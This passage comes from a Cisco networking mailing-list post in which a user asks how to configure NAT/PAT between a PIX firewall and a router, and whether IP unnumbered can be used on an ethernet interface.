> c. use PAT on router to translate for everything originating from PIX. > > I have tried the IP unnumbered option on my router e0/0, but the router wont > accept it, with error: point-to-point (non-multi-access) interfaces only. > > Now, my questions are: > > 1. If the ISP refuses to cooperate completely, what are the implications of > Option B with the double translation on PIX and router? > 2. If the ISP agrees to cooperate, which of the options in A above is the > best solution? > 3. Related to 2 above, if ISP agrees to cooperate with the simplest > solution, which seem to me to be, just a routing entry, is it possible, and > if so, how do I get to use IP unnumbered on an ethernet interface? > 4. Is there any better option/solution which I have not envisaged? > > I should be most grateful to anybody able to assist me on this problem. > Priscilla, Howard, Larry Letterman, Steve Rider ... etc etc. I will send my > present configs on request. > > TIA. > > Tunji > > > > > > > _ > Add photos to your messages with MSN 8. Get 2 months FREE*. > http://join.msn.com/?page=features/featuredemail Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57195&t=57193 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
